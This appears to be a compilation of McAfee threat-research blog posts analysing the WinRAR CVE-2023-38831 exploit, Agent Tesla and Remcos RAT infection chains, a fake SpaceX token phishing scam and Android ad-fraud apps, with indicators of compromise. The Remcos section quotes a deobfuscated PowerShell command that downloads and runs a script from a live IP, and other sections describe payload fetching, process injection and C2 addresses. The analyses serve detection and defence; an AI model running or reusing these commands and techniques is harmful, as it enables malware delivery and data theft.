Authored by Neil Tyagi

On 23 August 2023, NIST disclosed a critical RCE vulnerability CVE-2023-38831. It is related to an RCE vulnerability in WinRAR before version 6.23. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the harmless file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file.

Our intelligence shows that this vulnerability is being exploited as early as April 2023. Let’s look at a sample exploiting this vulnerability (Hash: bc15b0264244339c002f83e639c328367efb1d7de1b3b7c483a2e2558b115eaa)

• The image below shows that the archive is named trading_system, which hints that it is used to target traders

• We can also see that the threat actor can craft the archive so that folder and file names are the same.
• This is interesting as Windows doesn’t allow files and folders to have the same name in the same path.
• This shows that it was weaponized after creating a regular zip by changing the bytes to make the file and folder name the same.
• Also, note there is a trailing space at the end of the file and folder name (in yellow).
• When we look inside the folder, we see many files, but the most important file is highlighted, which is a bat file containing a malicious script.
• The bat file also has the same name as the benign file outside the folder.

• When we check the script, we see it launches cmd in the minimized state, then goes to the temp folder where WinRAR will extract the files, then tries to find the weakicons.com file, which is present inside the folder and executes it using wmic and then exits.
• Checking weakicons.com we find that it is a CAB SFX file.
• We extract it to check what is inside.
  
• We found a PE file, some ActiveX control objects, and two text files.
• AMD.exe is a visual basic compiled file whose main job is to extract the dll hidden in a blob of data inside pc.txt and execute the ActiveX controls.
• Inside add.txt, we find the registry keys it will try to manipulate
  
• The first control is responsible for registering a COM object in Windows. During registration, registry keys are imported from the “add.txt” file. As a result, a specific COM object with a unique CLSID is registered in the infected system. The default value of the InprocServer32 key is populated with the path to a malicious DLL named “Core.ocx”.
  

• Wmic process executes weakicons.com

• com executes AMD.exe

• AMD.exe extracts the encrypted dll file inside pc.txt and writes it in the romaing\nvidia folder.

• Here, we observe AMD.exe calls reg.exe on registry keys inside add.txt
  
• Timeout is also called to slow down the activities of the infection chain.
  
• AMD.exe Calls rundll32 on the clsid that is registered in the registry

• We can see successful tcp connection to threat actors C2.( ip 37[.]120[.]158[.]229)

Global Heatmap where this vulnerability is being seen in the wild(based on McAfee telemetry data)

Infection chain

How does the vulnerability work?

• Here, we will analyze the issue causing WinRAR to execute the script instead of opening the image.
• We will compare how WinRAR behaves when we execute an image file from a weaponized zip vs. a normal zip. So we fire up ProcMon First.

Normal.zip

Weaponized.zip

• The above image shows that the first logical bug is how WinRAR is extracting files in the temp folder before executing them. In the case of a regular zip, only the clean image file is extracted to the temp folder, whereas in the case of a weaponized zip, even the files present inside the folder are extracted to the temp folder along with the clean image file. This is due to the same file names we have given, which makes WinRAR extract those in temp.
• Verifying the same in the temp folder

Normal Zip

Weaponized Zip

• In Logs, when we dig deep, we can see Winrar searches for our filename with an *, which causes it to iterate over our bat file as it has the same name, which in turn gets executed.

• To see what’s happening under the hood, we hook a debugger and launch WinRAR by manipulating the “image file Execution options” registry key.
  
• When we execute the rar file, we see the debugger getting attached to the winrar process so that we can do just-in-time debugging.
• We put a breakpoint on the ShellExecuteExW function to see what parameters are passed to it just after clicking the jpeg file.
• When we double-click on the image file, we can see the debugger is opened, and after a few clicks, we hit our breakpoint.

Normal zip

• In this case, the correct parameter is passed to the ShellExecuteExW function as the file exists at this exact path.

Weaponized zip

• In this case, an incorrect parameter is passed to the ShellExecuteExW function as the parameter contains a trailing space, and such a file does not exist on the disk.
  
• When we dig deep, we find that later, it calls PathUnquoteSpacesA API call, as per MSDN. It “Removes quotes from the beginning and end of a path.”
• As quotes are removed from the end of the path, ShellExecuteExW executes “simple_image.jpg .cmd” instead of “simple_image.jpg.”

IOC’s

Sha256	Detection
bc15b0264244339c002f83e639c328367efb1d7de1b3b7c483a2e2558b115eaa	Trojan:Archive/2023_38831.NEAA

 

• .( ip 37[.]120[.]158[.]229)
• REG keys

• File path

%APPDATA%\Nvidia\Core.ocx

Recommendations

• WinRAR users should immediately update to the latest version. WinRAR archiver, a powerful tool to process RAR and ZIP files (rarlab.com)
• Use a licensed and updated McAfee+ subscription to stay protected.
• Stay informed about common cyber threats and tactics used by cybercriminals. This knowledge can help you recognize potential risks and avoid scams.
• Be very cautious when dealing with attachments from unknown sources. Only run attachments that come from trusted sources.
• Protect your accounts by using multi-factor authentication.

The post Exploring Winrar Vulnerability (CVE-2023-38831) appeared first on McAfee Blog.

Authored by Yashvi Shah

Agent Tesla functions as a Remote Access Trojan (RAT) and an information stealer built on the .NET framework. It is capable of recording keystrokes, extracting clipboard content, and searching the disk for valuable data. The acquired information can be transmitted to its command-and-control server via various channels, including HTTP(S), SMTP, FTP, or even through a Telegram channel.

Generally, Agent Tesla uses deceptive emails to infect victims, disguising as business inquiries or shipment updates. Opening attachments triggers malware installation, concealed through obfuscation. The malware then communicates with a command server to extract compromised data.

The following heat map shows the current prevalence of Agent Tesla on field:

Figure 1: Agent Tesla heat map

McAfee Labs has detected a variation where Agent Tesla was delivered through VBScript (VBS) files, showcasing a departure from its usual methods of distribution. VBS files are script files used in Windows for automating tasks, configuring systems, and performing various actions. They can also be misused by cybercriminals to deliver malicious code and execute harmful actions on computers.

Technical Analysis

The examined VBS file executed numerous PowerShell commands and then leveraged steganography to perform process injection into RegAsm.exe as shown in Figure 2. Regasm.exe is a Windows command-line utility used to register .NET assemblies as COM components, allowing interoperability between different software. It can also be exploited by malicious actors for purposes like process injection, potentially enabling covert or unauthorized operations.

Figure 2: Infection Chain

VBS needs scripting hosts like wscript.exe to interpret and execute its code, manage interactions with the user, handle output and errors, and provide a runtime environment. When the VBS is executed, wscript invokes the initial PowerShell command.

Figure 3: Process Tree

First PowerShell command

The first PowerShell command is encoded as illustrated here:

Figure 4: Encoded First PowerShell

Obfuscating PowerShell commands serves as a defense mechanism employed by malware authors to make their malicious intentions harder to detect. This technique involves intentionally obfuscating the code by using various tricks, such as encoding, replacing characters, or using convoluted syntax. This runtime decoding is done to hide the true nature of the command from static analysis tools that examine the code without execution. Upon decoding, achieved by substituting occurrences of ‘#@$#’ with ‘A’ and subsequently applying base64-decoding, we successfully retrieved the decrypted PowerShell content as follows:

Figure 5: Decoded content

Second PowerShell Command

The deciphered content serves as the parameter passed to the second instance of PowerShell..

Figure 6: Second PowerShell command

Deconstructing this command line for clearer comprehension:

Figure 7: Disassembled command

Steganography

As observed, the PowerShell command instructs the download of an image, from the URL that is stored in variable “imageURL.” The downloaded image is 3.50 MB in size and is displayed below:

Figure 8: Downloaded image

This image serves as the canvas for steganography, where attackers have concealed their data. This hidden data is extracted and utilized as the PowerShell commands are executed sequentially. The commands explicitly indicate the presence of two markers, ‘<<BASE64_START>>’ and ‘<<BASE64_END>>’. The length of the data is stored in variable ‘base64Length’. The data enclosed between these markers is stored in ‘base64Command’. The subsequent images illustrate these markers and the content encapsulated between them.

Figure 9: Steganography

After obtaining this data, the malware proceeds with decoding procedures. Upon examination, it becomes apparent that the decrypted data is a .NET DLL file. In the subsequent step, a command is executed to load this DLL file into an assembly.

Figure 10: DLL obtained from steganography

Process Injection into RegAsm.exe

This DLL serves two purposes:

1. Downloading and decoding the final payload
2. Injecting it into RegAsm.exe

Figure 11: DLL loaded

In Figure 11, at marker 1, a parameter named ‘QBXtX’ is utilized to accept an argument for the given instruction. As we proceed with the final stage of the PowerShell command shown in Figure 7, the sequence unfolds as follows:

$arguments = ,(‘txt.46ezabwenrtsac/42.021.871.591//:ptth’)

The instruction mandates reversing the content of this parameter and subsequently storing the outcome in the variable named ‘address.’ Upon reversing the argument, it transforms into:

http://195.178.120.24 /castrnewbaze64.txt

Figure 12: Request for payload

Therefore, it is evident that this DLL is designed to fetch the mentioned text file from the C2 server via the provided URL and save its contents within the variable named “text.” This file is 316 KB in size. The data within the file remains in an unreadable or unintelligible format.

Figure 13: Downloaded text file

In Figure 11, at marker 2, the contents of the “text” variable are reversed and overwritten in the same variable. Subsequently, at marker 3, the data stored in the “text” variable and is subjected to base64 decoding. Following this, we determined that the file is a .NET compiled executable.

Figure 14: Final payload

In Figure 11, another activity is evident at marker 3, where the process path for the upcoming process injection is specified. The designated process path for the process injection is:

“C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe”.

Since RegAsm.exe is a legitimate Windows tool, it’s less likely to raise suspicion from security solutions. Injecting .NET samples into it allows attackers to effectively execute their malicious payload within a trusted context, making detection and analysis more challenging.

Process injection involves using Windows API calls to insert code or a payload into the memory space of a running process. This allows the injected code to execute within the context of the target process. Common steps include allocating memory, writing code, creating a remote thread, and executing the injected code. In this context, the DLL performs a sequence of API calls to achieve process injection:

Figure 15: Process Injection

By obscuring the sequence of API calls and their intended actions through obfuscation techniques, attackers aim to evade detection and make it harder for security researchers to unravel the true behavior of the malicious code. The function ‘hU0H4qUiSpCA13feW0’ is used for replacing content. For example,

“kern!”.Replace(“!”, “el32”)  à  kernel32

Class1.hU0H4qUiSpCA13feW0(“qllocEx”, “q”, “VirtualA”) à VirtualAllocEx

As a result, these functions translate into the subsequent API calls:

1. CreateProcessA : This API call is typically employed to initiate the creation of a new process, rather than for process injection. In the context of process injection, the focus is generally on targeting an existing process and injecting code into it.
2. VirtualAllocEx: This is often used in process injection to allocate memory within the target process to host the injected code.
3. ReadProcessMemory: This is used to read the memory of a target process. It is typically used in reflective DLL injection to read the contents of a DLL from the injector’s memory and write it into the target process.
4. GetThreadContext: This API is used to retrieve the context (registers, flags, etc.) of a thread within a target process. It’s useful for modifying thread execution flow during injection.
5. Wow64GetThreadContext: This is like GetThreadContext, but it’s used when dealing with 32-bit processes on a 64-bit system.
6. SetThreadContext: This API is used to set the context of a thread within a target process. This can be useful for modifying the execution flow.
7. Wow64SetThreadContext: Like SetThreadContext, but for 32-bit processes on a 64-bit system.
8. ZwUnmapViewOfSection: This is used to unmap a section of a process’s virtual address space, which could potentially be used to remove a DLL loaded into a target process during injection.
9. WriteProcessMemory: This is used to write data into the memory of a target process. It’s commonly used for injecting code or data into a remote process.
10. ResumeThread: This is used to resume the execution of a suspended thread, often after modifying its context or injecting code.

Upon successful injection of the malware into RegAsm.exe, it initiates its intended operations, primarily focused on data theft from the targeted system.

The ultimate executable is heavily obfuscated. It employs an extensive array of switch cases and superfluous code, strategically intended to mislead researchers and complicate analysis. Many of the functions utilize either switch cases or their equivalent constructs, to defend detection. The following snippet of code depicts this:

Figure 16: Obfuscation

Collection of data:

Fingerprinting:

Agent Tesla collects data from compromised devices to achieve two key objectives: firstly, to mark new infections, and secondly, to establish a unique ‘fingerprint’ of the victim’s system. The collected data encompasses:

• Computer Name
• IP information
• Win32_baseboard
• Serial number
• win32_processor
• processorID
• Win32_NetworkAdapterConfiguration
• MacAddress

Web Browsers:

Agent Tesla initiates the process of gathering data from various web browsers. It utilizes switch cases to handle different browsers, determined by the parameters passed to it. All of these functions are heavily obscured through obfuscation techniques. The following figures depict the browser data that it attempted to retrieve.

Figure 17: Opera browser

Figure 18: Yandex browser

Figure 19: Iridium browser

Figure 20: Chromium browser

Similarly, it retrieves data from nearly all possible browsers. The captured log below lists all the browsers from which it attempted to retrieve data:

Figure 21: User data retrieval from all browsers -1

Figure 22: User data retrieval from all browsers – 2

Mail Clients:

Agent Tesla is capable of stealing various sensitive data from email clients. This includes email credentials, message content, contact lists, mail server settings, attachments, cookies, auto-complete data, and message drafts. It can target a range of email services to access and exfiltrate this information. Agent Tesla targets the following email clients to gather data:

Figure 23: Mail clients

Exfiltration:

Agent Tesla employs significant obfuscation techniques to evade initial static analysis attempts. This strategy conceals its malicious code and actual objectives. Upon successful decoding, we were able to scrutinize its internal operations and functionalities, including the use of SMTP for data exfiltration.

The observed sample utilizes SMTP as its chosen method of exfiltration. This protocol is frequently favored due to its minimal overhead demands on the attacker. SMTP reduces overhead for attackers because it is efficient, widely allowed in networks, uses existing infrastructure, causes minimal anomalies, leverages compromised accounts, and appears less suspicious compared to other protocols. A single compromised email account can be used for exfiltration, streamlining the process, and minimizing the need for complex setups. They can achieve their malicious goals with just a single email account, simplifying their operations.

Figure 24: Function calls made for exfiltration.

This is the procedure by which functions are invoked to facilitate data extraction via SMTP:

1. A specific value is provided as a parameter, and this value is processed within the functions. As a result, it ultimately determines the port number to be utilized for SMTP communication. In this case, port number 587 is used for communication.

Figure 25: Port number

2. Next, the malware retrieves the hostname of the email address it intends to utilize i.e., corpsa.net.

Figure 26: Domain retrieval

3. Subsequently, the email address through which communication is intended to occur is revealed.

Figure 27: Email address used

4. Lastly, the password for that email address is provided, so that attacker can log in and can start sending out the data.

Figure 28: Password

The SMTP process as outlined involves a series of systematic steps. It begins with the processing of a specific parameter value, which subsequently determines the port number for SMTP communication. Following this, the malware retrieves the associated domain of the intended email address, revealing the address itself and ultimately providing the corresponding password. This orchestrated sequence highlights how the malware establishes a connection through SMTP, facilitating its intended operations.

Following these steps, the malware efficiently establishes a login using acquired credentials. Once authenticated, it commences the process of transmitting the harvested data to a designated email address associated with the malware itself.

Summary:

The infection process of Agent Tesla involves multiple stages. It begins with the initial vector, often using email attachments or other social engineering tactics. Once executed, the malware employs obfuscation to avoid detection during static analysis. The malware then undergoes decoding, revealing its true functionality. It orchestrates a sequence of PowerShell commands to download and process a hidden image containing encoded instructions. These instructions lead to the extraction of a .NET DLL file, which subsequently injects the final payload into the legitimate process ‘RegAsm.exe’ using a series of API calls for process injection. This payload carries out its purpose of data theft, including targeting browsers and email clients for sensitive information. The stolen data is exfiltrated via SMTP communication, providing stealth and leveraging email accounts. Overall, Agent Tesla’s infection process employs a complex chain of techniques to achieve its data-stealing objectives.

Indicators of compromise (IoC):

File	MD5	SHA256
VBS file	e2a4a40fe8c8823ed5a73cdc9a8fa9b9	e7a157ba1819d7af9a5f66aa9e161cce68d20792d117a90332ff797cbbd8aaa5
JPEG file	ec8dfde2126a937a65454323418e28da	21c5d3ef06d8cff43816a10a37ba1804a764b7b31fe1eb3b82c144515297875f
DLL file	b257f83495996b9a79d174d60dc02caa	b2d667caa6f3deec506e27a5f40971cb344b6edcfe6182002f1e91ce9167327f
Final payload	dd94daef4081f63cf4751c3689045213	abe5c5bb02865ac405e08438642fcd0d38abd949a18341fc79d2e8715f0f6e42

Table 1:Indicators of Compromise

The post Agent Tesla’s Unique Approach: VBS and Steganography for Delivery and Intrusion appeared first on McAfee Blog.

Authored by Preksha Saxena

McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email. A phishing email contained a ZIP/RAR attachment. Inside this ZIP, was a heavily obfuscated VBS file. 

Remcos is a sophisticated RAT which provides an attacker with backdoor access to the infected system and collects a variety of sensitive information. Remcos incorporates different obfuscation and anti-debugging techniques to evade detection. It regularly updates its features and makes this malware a challenging adversary. 

Execution Flow: 

  

Figure 1: Execution Flow 

Stage 1: Analysis of VBS file 

VBS file is downloaded from a RAR file which is named as “August 2023 Statement of Account.z” This VBS file used various techniques to make analysis very difficult; including lots of commented code, and random strings that mask the true execution chain from being quickly visible. The actual data for execution is obfuscated too. 

Investigating this VBS script started with dealing with the large comment blocks as shown in figure below. 

Figure 2:VBS Script 

 One obfuscated string references a URL. The script contains a replace function to deobfuscate the proper command line. 

Another part of VBS script is the execute function shown in below image, which merely decodes a fake message. 

“omg!it’s_so_long_:-)you_found_the_secret_message_congrats!!” 

Figure 3:Deobfuscating PowerShell command using replace function. 

 The purpose of this VBS script is to download a payload using PowerShell. To increase the size, and make the script obfuscated, comments were added. The PowerShell command deobfuscates to: 

“powershell -w 1 -exeC Bypass -c “”[scriptblock]::Create ((Invoke-WebRequest ‘http://212.192.219.52/87656.txt’ -UseBasicParsing).Content).Invoke();””” 

Stage 2: Analysis of PowerShell script (87656.txt)  

The downloaded file, 87656.txt, is an obfuscated PowerShell script. 

Figure 4:Obfuscated PowerShell Script 

 The deobfuscation logic first searches for any variable containing “mdR”; in this case the result is ‘MaximumDriveCount’. From this string, characters at positions [3,11,2] are selected, resulting in the string “iex”. Here malware obfuscates iex(Invoke-Expression) command to evade itself from static detection. 

Figure 5:Resolving IEX 

Then, PowerShell script decodes the data using the Base64String algorithm and decompresses the decoded data using the Deflate Stream algorithm. 

Decompressed data is again a PowerShell script which is analyzed below. 

Stage 3: Analysis of decompressed PowerShell script  

The decompressed PowerShell script is large and obfuscated: 

Figure 6: Decompressed PowerShell script 

The first part of the script has the same logic present in the first PowerShell file. It is again decoding invoke-expression “ieX” by using the psHome variable. 

Figure 7:Deobfuscating PowerShell script 

The second part of the PowerShell script contains a base64 encoded PE file, which will be analyzed in a later stage. 

Figure 8: Base64 encoded data. 

The third part of PowerShell script is used to inject the decoded PE file in a newly created process. After deobfuscation, the code below is used for code injection. “Wintask.exe” is launched as a new process by the PowerShell script and the aforementioned PE file is injected in the Wintask.exe process. 

 Figure 9: Code used for PE injection. 

Windows Defender exclusions are added. 

Figure 10: Exclusion code 

Stage 4: Analysis of decoded PE File  

The 1.1MB PE file is a .NET binary, using an MSIL loader. 

Figure 11: MSIL Loader 

The Main function calls the Units function, which calls a random function. 

Figure 12:Main function 

The random function contains a large amount of encrypted data, stored in a text variable. 

Figure 13: Encrypted data 

The ‘text’ data is first converted from string to hex array then reversed and stored in variable ‘array’. The decryption key is hardcoded and stored in variable ‘array4’. The key is “0xD7” (215 in decimal). 

Figure 14: code for converting data to uppercase. 

The decryption loop issues the RC4 algorithm. The data decrypts a PE file, which is a DLL (Dynamic Link Library), loaded and executed using the ‘NewLateBinding.LateGet()’ method, passing the payload file (dGXsvRf.dll) as an argument as shown below. 

To execute the decrypted DLL in memory, the malware uses reflecting code loading. In this process, malware injects and executes the decrypted code in the same process. For this, the malware uses the load parameter in the ‘NewLateBinding.LateGet()’ function. 

Figure 15: RC4 algorithm 

Figure 16: New instance created for decrypted dll 

Stage 5: Analysis of dGXsvRf.dll 

Decrypted DLL ‘dGXsvRf.dll’ is the SykCrypter Trojan, using a resource named “SYKSBIKO” containing an encrypted payload. 

Figure 17: Encrypted payload 

SykCrypter decrypts the final payload and decrypts many strings related to identifying the presence of AV software, persistence, and anti-debugging techniques. The SykCrypter encrypted data is very large and is decrypted using a simple XOR operation with 170 as the key and current index.  

Figure 18: SykCryptor Encrypted data 

Each string is decrypted and accessed using a predefined function which hardcodes its length and offset in a large byte array. The final payload is stored in a resource and is decrypted using the RC4 algorithm with the key “uQExKBCIDisposablev”. 

Figure 19: RC4 Algorithm 

Another .NET dll with size 0x1200 and the method name, “Zlas1” is used for deflation. 

Figure 20: Loading DLL for deflation. 

The DLL then decrypts a list of various security solution process names: 

Figure 21:Code for decrypting Security processes Names 

The decrypted list of process names include: 

vsserv bdservicehost odscanui bdagent  

bullgaurd BgScan BullGuardBhvScanner etc. 

The malware also drops acopy of itself in the %appdata% folder using cmd. 

Figure 22: Copying file. 

Persistence: 

To persist system reboots, the malware creates a shortcut file in the Documents folder with a.pif extension, and creates a registry Run key entry. 

Figure 23: Persistence Mechanism 

Process Injection: 

The SykCrypter Dll decrypts and loads a .NET file and calls its “GetDelegateForFunctionPointer” function, creating delegation to all APIs from kernel32 and NTDll.dll in the same method. It loads GetThreadContext, SetThreadContext, ReadProcessMemory, VirtualAllocEx, NtUnmapViewOfSection and so on. 

Then, finally it loads “WriteProcessMemory,” API which injects the decrypted payload into a process and calls ResumeThread. 

Figure 24: Process Injection 

Stage 6: Analysis of final payload 

The final payload is a Microsoft Visual C++ 8 executable with size of 477 KB. Strings directly visible in file are: 

Figure 25: Strings in payload 

The configuration file of Remcos is present in RCData “SETTINGS“, which is encrypted with the RC4 algorithm. In the given sample, the key size is 76 byte long. 

Figure 26: RC4 encrypted configuration file 

Decrypted Configuration: 

 Figure 27: Decrypted configuration 

The Remcos configuration has C2 information (172.96.14.18), its port number (2404), mutex created by malware (Rmc-OB0RTV) and other configuration details. It has the capability to harvest information from various applications, such as browsers, email clients, cryptocurrency wallets etc. It also enables remote access for an attacker and can act as a dropper for other malware. 

Conclusion: 

RemcosRat is a complex multi-stage threat. McAfee Labs unpacked the how this malware downloads and executes VBS and PowerShell scripts; how the threat unwraps different layers and downloads the final Remcos remote access payload. At McAfee, we are committed to providing our customers with robust and effective threat defense that detects and protects against threats like RemcosRat and many other families. Our security software uses a combination of signature, machine learning, threat intelligence and behavioral-based detection techniques to identify and stop threats to keep you safe. 

Indicators of Compromise (IOCs):  

SHA256	Filetype
0b3d65305edc50d3882973e47e9fbf4abc1f04eaecb13021f434eba8adf80b67	VBS
3ed5729dc3f12a479885e434e0bdb7722f8dd0c0b8b27287111564303b98036c	PowerShell
1035dbc121b350176c06f72311379b230aaf791b01c7091b45e4c902e9aba3f4	MSIL loader
32c8993532bc4e1f16e86c70c0fac5d51439556b8dcc6df647a2288bc70b8abf	SykCrypter
61c72e0dd15ea3de383e908fdb25c6064a5fa84842d4dbf7dc49b9a01be30517	Remcos Payload

The post Peeling Back the Layers of RemcosRat Malware appeared first on McAfee Blog.

Authored by: Neil Tyagi  

Scam artists know no bounds—and that also applies to stealing your cryptocurrency. Crypto scams are like any other financial scam, except the scammers are after your crypto assets rather than your cash. 

Crypto scammers use many tactics in other financial crimes, such as pump-and-dump scams that lure investors to purchase an asset with fake claims about its value or outright attempts to steal digital assets. 

This time scammers were trying to get an investor to send a digital asset as a form of payment for a fraudulent transaction. 

It starts with a Tweet used as bait to lure innocent cryptocurrency investors into purchasing a non-existent token, related to a reputed company, SpaceX. 

The theme used here by scammers is the sale of the official cryptocurrency of SpaceX. In the above image we can also see the reach of the tweet is high. (224.4K views) 

 Protection with McAfee+:  

McAfee+ provides all-in-one online protection for your identity, privacy, and security. With McAfee+, you’ll feel safer online because you’ll have the tools, guidance, and support to take the steps to be safer online. McAfee protects against these types of scam sites with Web Advisor protection that detects malicious websites. 

The link present in this tweet redirects to  space[-]launch[.]net, which is already marked as malicious by McAfee. 

A WHOIS search on the site reveals it is hosted on Cloudflare. Cloudflare has increasingly become the number one choice for scammers to host malicious websites and protect their assets. 

A WHOIS lookup on the domain reveals redacted personal information. No surprises there  

When we click on the link, it takes us to a login page and asks for SpaceX login credentials. This page was designed as a phishing page for people who have real SpaceX login credentials. 

 

For people who don’t have SpaceX credentials, they can use the signup link.  

 

After we log in, it redirects to a landing page where one can purchase the supposedly original cryptocurrency launched by SpaceX

 

As you can see, it impersonates as the official SpaceX portal for buying their token. It also has all the elements related to SpaceX and its branding. 

In the above picture, we can see that scammers are employing the social engineering trick of FOMO (Fear Of Missing Out) as they have created a timer showing that the fake tokens are only available for purchase for the next 10 hours. This also makes sure that the scam would end before all the online security vendors flag the site. 

Scammers also allow users to purchase fake tokens from about 22 cryptocurrencies, the prominent being Bitcoin, Ethereum, and USDT. 

 

Scammers even offer a bonus of fake SpaceX tokens if users are ready to purchase a minimum amount

Here we can find the BTC wallet address of the scammers and see the transactions related to these wallets. 

The crypto wallet addresses of scammers for the following currencies are.  

• BTC bc1qhhec8pkhj2cxtk6u0dace8terq22hspxkr5pee 
• USDT 398a9BF5fe5fc6CaBB4a8Be8B428138BC7356EC1 
• ETH 16a243E3392Ffd9A872F3fD90dE79Fe7266452F9 

Looking at transactions related to these addresses, we find people have become victims of this scam by sending payments to these wallets. The Bitcoin wallet above has gathered around 2,780 US dollars. You can also see three of the last transactions made to the account. 

Similarly, for Ethereum, the scammers have gathered around 1,450 US dollars 

We observed two popular cryptocurrencies, but scammers are using about 22 different crypto wallets.  

Crypto phishing scams constantly evolve, and new tactics emerge regularly. Users should take the initiative to educate themselves about the latest phishing techniques and scams targeting the cryptocurrency community. Also, stay informed by researching and reading about recent phishing incidents and security best practices. 

IOC (Indicator of Compromise)  

Domain	Crypto Type	Wallet address
space[-]launch[.]net	BTC	bc1qhhec8pkhj2cxtk6u0dace8terq22hspxkr5pee
space[-]launch[.]net	USDT	398a9BF5fe5fc6CaBB4a8Be8B428138BC7356EC1
space[-]launch[.]net	ETH	16a243E3392Ffd9A872F3fD90dE79Fe7266452F9
space[-]launch[.]net	XRP	rnmj4xsaaEaGvFbrsg3wCR6Hp2ZvgjMizF
space[-]launch[.]net	DASH	XxD3tJ7RA81mZffKFiycASMiDsUdqjLFD1
space[-]launch[.]net	BCH	qr45csehwfm5uu9xu4mqpptsvde46t8ztqkzjlww68
space[-]launch[.]net	USDC	0x398a9BF5fe5fc6CaBB4a8Be8B428138BC7356EC1

 

 

 

The post Crypto Scam: SpaceX Tokens for Sale appeared first on McAfee Blog.

Authored by SangRyol Ryu, McAfee Threat Researcher

We live in a world where advertisements are everywhere, and it’s no surprise that users are becoming tired of them. By contrast, developers are driven by profit and seek to incorporate more advertisements into their apps. However, there exist certain apps that manage to generate profit without subjecting users to the annoyance of ads. Is this really good?  

Recently, McAfee’s Mobile Research Team discovered a concerning practice among some apps distributed through Google Play. These apps load ads while the device’s screen is off, which might initially seem convenient for users. However, it’s a clear violation of Google Play Developer policy on how ads should be displayed. This affects not only the advertisers who pay for invisible Ads, but also the users as it drains battery, consumes data and poses potential risks such as information leaks and disruption of user profiling caused by Clicker behavior. 

The team has identified 43 apps that collectively downloaded 2.5 million times. Among the targeted apps are TV/DMB Player, Music Downloader, News, and Calendar applications. McAfee is a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. We reported the discovered apps to Google, which took prompt action. Most apps are no longer available on Google Play while others are updated by the developer. McAfee Mobile Security detects this threat as Android/Clicker. For more information, and to get fully protected, visit McAfee Mobile Security. 

Many affected apps

How does it work? 

This ad fraud library uses specific tactics to avoid detection and inspection. It deliberately delays the initiation of its fraudulent activities, creating a latent period from the time of installation. What’s more, all the intricate configurations of this library can be remotely modified and pushed using Firebase Storage or Messaging service. These factors significantly add to the complexity of identifying and analyzing this fraudulent behavior. Notably, the latent period typically spans several weeks, which makes it challenging to detect. 

Getting latent period by using Firebase Messaging Service 

It is important to be cautious about the implications of granting permissions, such as excluding ‘power saving’ and allowing ‘draw over other apps’. These permissions can enable certain activities to occur discreetly in the background, raising concerns about the intentions and behavior of the applications or libraries in question. Allowing these permissions can result in more malicious behavior, such as displaying phishing pages, also to displaying ads in the background. 

Asked permissions to run in the background and keep it hidden 

When the device screen is turned off after the latent period, the fetching and loading of ads starts, resulting in users being unaware of the presence of running advertisements on their devices. This ad library registers device information by accessing the unique domain (ex: mppado.oooocooo.com) linked with the application. Then go to Firebase Storage to get the specific advertisement URL and show the ads. It is important to note that this process consumes power and mobile data resources. 

Observed traffic when the screen off 

If users quickly turn on their screens at this point, they might catch a glimpse of the ad before it is automatically closed. 

Example of an advertising site displayed when the screen is off 

In conclusion, it is essential for users to exercise caution and carefully evaluate the necessity of granting permissions like power saving exclusion, or draw over other apps before allowing them. While these permissions might be required for certain legitimate functionalities for running in the background, it is important to consider the potential risks linked with them, such as enabling hidden behaviors or reducing the relevance of ads and contents displayed to users because the hidden Clicker behavior. By using McAfee Mobile Security products, users can further safeguard their devices and mitigate the risks linked with these kinds of malware, providing a safer and more secure experience. For more information, visit McAfee Mobile Security

 

Indicators of Compromise (IoC’s)

Domains:

best.7080music.com 

m.gooogoole.com 

barocom.mgooogl.com 

newcom.mgooogl.com 

easydmb.mgooogl.com 

freekr.mgooogl.com 

fivedmb.mgooogl.com 

krlive.mgooogl.com 

sixdmb.mgooogl.com 

onairshop.mgooogle.com 

livedmb.mgooogle.com 

krbaro.mgooogle.com 

onairlive.mgooogle.com 

krdmb.mgooogle.com 

onairbest.ocooooo.com 

dmbtv.ocooooo.com 

ringtones.ocooooo.com 

onairmedia.ocooooo.com 

onairnine.ocooooo.com 

liveplay.oocooooo.com 

liveplus.oocooooo.com 

liveonair.oocooooo.com 

eightonair.oocooooo.com 

krmedia.oocooooo.com 

kronair.oocooooo.com 

newkrbada.ooooccoo.com 

trot.ooooccoo.com 

thememusic.ooooccoo.com 

trot.ooooccoo.com 

goodkrsea.ooooccoo.com 

krlive.ooooccoo.com 

news.ooooccoo.com 

bestpado.ooooccoo.com 

krtv.oooocooo.com 

onairbaro.oooocooo.com 

barolive.oooocooo.com 

mppado.oooocooo.com 

dmblive.oooocooo.com 

baromedia.oooocooo.com 

musicbada.oouooo.com 

barolive.oouooo.com 

sea.oouooo.com 

blackmusic.oouooo.com 

Android Packages 

Package Name	Application Name	SHA256	Google Play Downloads
band.kr.com	DMB TV	f3e5aebdbd5cd94606211b04684730656e0eeb1d08f4457062e25e7f05d1c2d1	10,000+
com.dmb.media	DMB TV	6aaaa6f579f6a1904dcf38315607d6a5a2ca15cc78920743cf85cc4b0b892050	100,000+
dmb.onair.media	DMB TV	a98c5170da2fdee71b699ee145bfe4bdcb586b623bbb364a93bb8bdf8dbc4537	10,000+
easy.kr	DMB TV	5ec8244b2b1f516fd96b0574dc044dd40076ff7aa7dadb02dfefbd92fc3774bf	100,000+
kr.dmb.onair	DMB TV	e81c0fef52065864ee5021e1d4c7c78d6a407579e1d48fc4cf5551ff0540fdb8	5,000+
livedmb.kr	DMB TV	33e5606983526757fef2f6c1da26474f4f9bf34e966d3c204772de45f42a6107	50,000+
stream.kr.com	DMB TV	a13e26bce41f601a9fafdec8003c5fd14908856afbab63706b133318bc61b769	100+
com.breakingnews.player	뉴스 속보	d27b8e07b7d79086af2fa805ef8d77ee51d86a02d81f2b8236febb92cb9b242d	10,000+
jowonsoft.android.calendar	달력	46757b1f785f2b3cec2906a97597b7db4bfba168086b60dd6d58d5a8aef9e874	10,000+
com.music.free.bada	뮤직다운	a3fe9f9b531ab6fe79ed886909f9520a0d0ae98cf11a98f061dc179800aa5931	100,000+
com.musicdown	뮤직다운	5f8eb3f86fc608f9de495ff0e65b866a78c25a9260da04ebca461784f039ba16	5,000+
new.kr.com	뮤직다운	397373c39352ef63786fe70923a58d26cdf9b23fa662f3133ebcbc0c5b837b66	100,000+
baro.com	바로TV	3b4302d00e21cbf691ddb20b55b045712bad7fa71eb570dd8d3d41b8d16ce919	10,000+
